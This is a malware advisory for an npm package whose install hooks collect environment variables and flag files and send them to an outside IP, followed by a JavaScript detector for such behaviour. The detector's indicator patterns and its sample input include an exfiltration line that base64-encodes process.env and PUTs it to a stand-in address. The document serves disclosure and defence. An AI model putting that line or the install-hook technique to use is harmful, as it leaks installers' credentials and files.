MAL-2026-6699
Malicious code in ecto-corsair-flag-7kq3mz (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2a4dfa9f4805e5b44c7ccf3e4c3859abf8e9f0388f11e3daf6065f43c49e09ed)

Package wires preinstall, install, and postinstall lifecycle hooks to run postinstall.js, which executes unconditionally on npm install. The script collects hostname, cwd, uid, and environment variables matching FLAG/CTF/NPM/REGISTRY/CI/GITHUB/RUNNER, reads candidate flag files, and uses child_process.execSync to recursively grep installer-side directories (/app, /workspace, /challenge, /home/runner/work/repo/repo, ., .., ../..) for flag-shaped strings. The collected manifest is base64-encoded and PUT to http://154.57.164.76:30728/api/modules/<id>, with an additional GET beacon to webhook.site/755defab-ea42-4c1f-9804-43ec567439f5. postinstall.js also tests npm_config_registry against /verdaccio/i to detect successful dependency-confusion landings, and the shipped publish-and-arm.sh and README self-describe the package as an 'armed' dependency-confusion probe. Regardless of the CTF/probe framing, installing this package causes unconsented exfiltration of installer environment and filesystem contents to an attacker-controlled IP.
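A static check for the install-time behaviours described above, as an added example that is not part of the advisory or the package: it inspects a parsed package.json and the script its lifecycle hooks run. The function name, the indicator list, the sample manifest and the 192.0.2.10 address are constructed assumptions.

```javascript
// Added example: static triage for the install-time behaviours described in
// this advisory. Indicator names and thresholds are assumptions, not a standard.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];
const INDICATORS = [
  { id: 'child-process-exec', re: /child_process|execSync\s*\(/ },
  { id: 'env-harvest', re: /process\.env\b(?!\.npm_config_registry)/ },
  { id: 'registry-fingerprint', re: /npm_config_registry/ },
  { id: 'base64-encode', re: /toString\(\s*['"]base64['"]\s*\)|btoa\s*\(/ },
  { id: 'raw-ip-url', re: /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/ },
];

// manifest: parsed package.json; files: { relativePath: sourceText }.
function auditPackage(manifest, files) {
  const scripts = manifest.scripts || {};
  const hooks = INSTALL_HOOKS.filter((h) => typeof scripts[h] === 'string');
  const targets = new Set();
  for (const h of hooks) {
    // Resolve "node postinstall.js" style commands to a file shipped in the package.
    const m = /\bnode\s+(?:\.\/)?([\w./-]+\.[cm]?js)\b/.exec(scripts[h]);
    if (m && typeof files[m[1]] === 'string') targets.add(m[1]);
  }
  const found = new Set();
  for (const t of targets) {
    for (const { id, re } of INDICATORS) if (re.test(files[t])) found.add(id);
  }
  return {
    hooks,
    targets: [...targets],
    indicators: [...found].sort(),
    // All three hooks on one script: it runs on every install path.
    sameScriptOnAllHooks: hooks.length === 3 && targets.size === 1,
    // Command execution plus a network or registry-probing signal at install time.
    suspicious: found.has('child-process-exec') &&
      (found.has('raw-ip-url') || found.has('registry-fingerprint')),
  };
}

// Constructed sample input (192.0.2.10 is a documentation address).
const SAMPLE_MANIFEST = { name: 'example-pkg', scripts: {
  preinstall: 'node postinstall.js', install: 'node postinstall.js',
  postinstall: 'node postinstall.js' } };
const SAMPLE_FILES = { 'postinstall.js': [
  "const { execSync } = require('child_process');",
  "const landed = /verdaccio/i.test(process.env.npm_config_registry);",
  "const blob = Buffer.from(JSON.stringify(process.env)).toString('base64');",
  "fetch('http://192.0.2.10:8080/api/modules/x', { method: 'PUT', body: blob });",
].join('\n') };

console.log(auditPackage(SAMPLE_MANIFEST, SAMPLE_FILES));
```

A `suspicious` result is a triage signal for manual review of the hook script; running installs with `npm install --ignore-scripts` keeps lifecycle hooks from executing while a package is being evaluated.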
Affected packages
No fixed version published yet for ecto-corsair-flag-7kq3mz (npm). Pin to a known-safe version or switch to an alternative.